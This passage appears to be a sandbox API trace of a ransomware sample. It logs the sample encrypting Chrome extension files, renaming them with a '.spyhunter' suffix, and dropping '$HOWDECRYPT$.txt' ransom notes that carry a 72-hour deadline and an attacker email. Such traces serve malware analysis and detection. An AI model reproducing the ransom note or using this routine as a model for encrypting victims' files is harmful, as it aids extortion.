lpOverlapped=0x0 | out: lpBuffer=0x248ec14*, lpNumberOfBytesWritten=0x248ebd4*=0x4, lpOverlapped=0x0) returned 1 [0159.029] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebd4*=0x30, lpOverlapped=0x0) returned 1 [0159.029] CloseHandle (hObject=0x9c) returned 1 [0159.029] GetProcessHeap () returned 0x2c0000 [0159.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.029] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.spyhunter") returned 170 [0159.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.spyhunter")) returned 1 [0159.030] GetProcessHeap () returned 0x2c0000 [0159.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.031] GetProcessHeap () returned 0x2c0000 [0159.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.031] GetProcessHeap () returned 0x2c0000 [0159.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20658 | out: hHeap=0x2c0000) returned 1 [0159.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.032] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.032] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec70, lpOverlapped=0x0 | out: lpBuffer=0x248eb47*, lpNumberOfBytesWritten=0x248ec70*=0x127, lpOverlapped=0x0) returned 1 [0159.032] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.032] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec70*=0x2ac, lpOverlapped=0x0) returned 1 [0159.033] CloseHandle (hObject=0x9c) returned 1 [0159.033] GetProcessHeap () returned 0x2c0000 [0159.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3ea8 | out: hHeap=0x2c0000) returned 1 [0159.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.034] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.034] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x248eb43*, lpNumberOfBytesWritten=0x248ec6c*=0x127, lpOverlapped=0x0) returned 1 [0159.035] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.035] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec6c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.035] CloseHandle (hObject=0x9c) returned 1 [0159.035] GetProcessHeap () returned 0x2c0000 [0159.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc6eb8 | out: hHeap=0x2c0000) returned 1 [0159.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.036] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.036] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec68, lpOverlapped=0x0 | out: lpBuffer=0x248eb3f*, lpNumberOfBytesWritten=0x248ec68*=0x127, lpOverlapped=0x0) returned 1 [0159.037] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.037] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec68*=0x2ac, lpOverlapped=0x0) returned 1 [0159.037] CloseHandle (hObject=0x9c) returned 1 [0159.037] GetProcessHeap () returned 0x2c0000 [0159.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f548 | out: hHeap=0x2c0000) returned 1 [0159.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec08 | out: pbBuffer=0x248ec08) returned 1 [0159.037] GetProcessHeap () returned 0x2c0000 [0159.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.037] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec00*=0x30) returned 1 [0159.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0159.038] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0159.038] GetProcessHeap () returned 0x2c0000 [0159.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.038] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebc4*=0x2686, lpOverlapped=0x0) returned 1 [0159.176] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd97a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.176] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2686, lpNumberOfBytesWritten=0x248ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebc4*=0x2686, lpOverlapped=0x0) returned 1 [0159.176] GetProcessHeap () returned 0x2c0000 [0159.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.176] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.176] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebc4, lpOverlapped=0x0 | out: lpBuffer=0x248ec04*, lpNumberOfBytesWritten=0x248ebc4*=0x4, lpOverlapped=0x0) returned 1 [0159.176] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebc4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebc4*=0x30, lpOverlapped=0x0) returned 1 [0159.177] CloseHandle (hObject=0x9c) returned 1 [0159.177] GetProcessHeap () returned 0x2c0000 [0159.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.177] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.spyhunter") returned 172 [0159.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0159.178] GetProcessHeap () returned 0x2c0000 [0159.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.179] GetProcessHeap () returned 0x2c0000 [0159.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.179] GetProcessHeap () returned 0x2c0000 [0159.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20328 | out: hHeap=0x2c0000) returned 1 [0159.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.181] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.181] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb37*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec60, lpOverlapped=0x0 | out: lpBuffer=0x248eb37*, lpNumberOfBytesWritten=0x248ec60*=0x127, lpOverlapped=0x0) returned 1 [0159.182] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.182] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec60*=0x2ac, lpOverlapped=0x0) returned 1 [0159.182] CloseHandle (hObject=0x9c) returned 1 [0159.182] GetProcessHeap () returned 0x2c0000 [0159.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82990 | out: hHeap=0x2c0000) returned 1 [0159.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec00 | out: pbBuffer=0x248ec00) returned 1 [0159.182] GetProcessHeap () returned 0x2c0000 [0159.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.183] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebf8*=0x30) returned 1 [0159.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json") returned 155 [0159.184] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.184] GetProcessHeap () returned 0x2c0000 [0159.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.184] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebbc*=0x124, lpOverlapped=0x0) returned 1 [0159.185] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.185] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x248ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebbc*=0x124, lpOverlapped=0x0) returned 1 [0159.185] GetProcessHeap () returned 0x2c0000 [0159.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.186] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.186] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebbc, lpOverlapped=0x0 | out: lpBuffer=0x248ebfc*, lpNumberOfBytesWritten=0x248ebbc*=0x4, lpOverlapped=0x0) returned 1 [0159.186] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebbc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebbc*=0x30, lpOverlapped=0x0) returned 1 [0159.186] CloseHandle (hObject=0x9c) returned 1 [0159.186] GetProcessHeap () returned 0x2c0000 [0159.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.186] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.spyhunter") returned 165 [0159.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0159.188] GetProcessHeap () returned 0x2c0000 [0159.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.188] GetProcessHeap () returned 0x2c0000 [0159.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.188] GetProcessHeap () returned 0x2c0000 [0159.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82808 | out: hHeap=0x2c0000) returned 1 [0159.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.189] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.189] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec58, lpOverlapped=0x0 | out: lpBuffer=0x248eb2f*, lpNumberOfBytesWritten=0x248ec58*=0x127, lpOverlapped=0x0) returned 1 [0159.190] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.190] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec58*=0x2ac, lpOverlapped=0x0) returned 1 [0159.191] CloseHandle (hObject=0x9c) returned 1 [0159.191] GetProcessHeap () returned 0x2c0000 [0159.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82680 | out: hHeap=0x2c0000) returned 1 [0159.191] CryptGenRandom (in: 